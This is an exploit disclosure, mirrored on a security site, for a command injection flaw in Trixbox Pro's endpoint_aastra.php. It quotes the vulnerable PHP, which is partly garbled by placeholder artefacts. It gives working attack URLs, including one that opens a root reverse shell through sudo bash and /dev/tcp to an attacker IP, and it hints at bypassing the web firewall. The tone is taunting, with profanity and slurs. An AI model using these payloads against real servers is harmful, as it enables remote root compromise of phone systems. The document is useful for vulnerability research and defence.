首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Trixbox Pro Remote Command Execution
来源:n0p1337@gmail.com 作者:i-Hmx 发布时间:2014-03-17  
# App : Trixbox all versions
# vendor : trixbox.com
# Author : i-Hmx
# mail : n0p1337@gmail.com
# Home : security arrays inc , sec4ever.com ,exploit4arab.net

Well well well , we decided to give schmoozecom a break and have a look @
fonality products
do you think they have better product than the (Award winning) trixbox!!!
I don't think so
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3 years old Sql injection flaw???
not big deal , and already been reported
not enough good exploitation , but reported
A file disclosure flaw???
save it for later
let's give Fonality little Remote root Exploit xD
and also give the "Predictors" some pain in the ass trying to exploit this
consider it as challenge ;)
Here we go
Vulnerable file :
/var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
Pice of shit , sorry i mean code

switch(
___FCKpd___0
action) { case 'Edit': if (
___FCKpd___0
REQUEST['newmac']){ // create a new phone from device map $mac_address =
___FCKpd___0
REQUEST['newmac']; } if (
___FCKpd___0
REQUEST['mac']){ $phoneinfo = GetPhone(
___FCKpd___0
REQUEST['mac'],$PhoneType); $mac_address=$phoneinfo['mac_address']; } // if there is a request ID we Edit otherwise add a new phone $freepbx_device_list = GetFreepbxDeviceList(); $smarty->assign("mac_address", $mac_address); $smarty->assign("phone", $phoneinfo); $smarty->assign("freepbx_device_list", $freepbx_device_list); $smarty->assign("message", $message); $template = "endpoint_".$PhoneType."_edit.tpl"; break; case 'Delete': exec("rm ".$sipdir.
___FCKpd___0
REQUEST['mac'].".cfg"); getSQL("DELETE FROM ".$PhoneType." WHERE mac_address='".
___FCKpd___0
REQUEST['mac']."'",'endpoints'); $smarty->assign("phones", ListPhones($PhoneType)); $template = "endpoint_".$PhoneType."_list.tpl"; break; it's obvious we care about this line >>>exec("rm ".$sipdir.
___FCKpd___0
REQUEST['mac'].".cfg");<<< Exploitation demo : maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo id>xx;faris result will be written to xx but this is not the full movie yet , Am here to give fonality an night mare , which take the form of "root" privzz actually the server is configured by default to allow the web interface pages to edit many files @ the root directory so any noob can easily execute the "sudo fuck" with out being permited for password , and the result is > root Demo <Back connection with root privs> maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris change to your ip and the port you are listening to and , Volia , you are root now am sure you're happy as pig in shit xD Still need more?? you will notice that you're unable to reach this file due to the http firewall but actually there is simple and yet dirty trick that allow you to get pass through it , and execute your command smooooothely as boat on the river ;) And here come the challenge , let's see what the faggots can do with this ;) need hint??? use your mind and fuck off :/ Big greets fly to the all sec4ever family oh , and for voip lames , you can use our 0Days for sure but once it become 720Days xD Regards, Faris <the Awsome>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iOS 7 Arbitrary Code Execution
·Gold MP4 Player 3.3 - Universa
·OS X / Safari / Firefox REGEX
·Free Download Manager 3.x Buff
·HP-UX rlpdaemon local exploit
·MicroP 0.1.1.1600 - (.mppl) Lo
·Array Networks vxAG / xAPV Pri
·Firefox Exec Shellcode From Pr
·NTP Spoofed "monlist query" De
·Zoo 2.10 - Parse.c Local Buffe
·Quantum vmPRO Backdoor Command
·Ruby Gem Arabic Prawn 0.0.1 Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved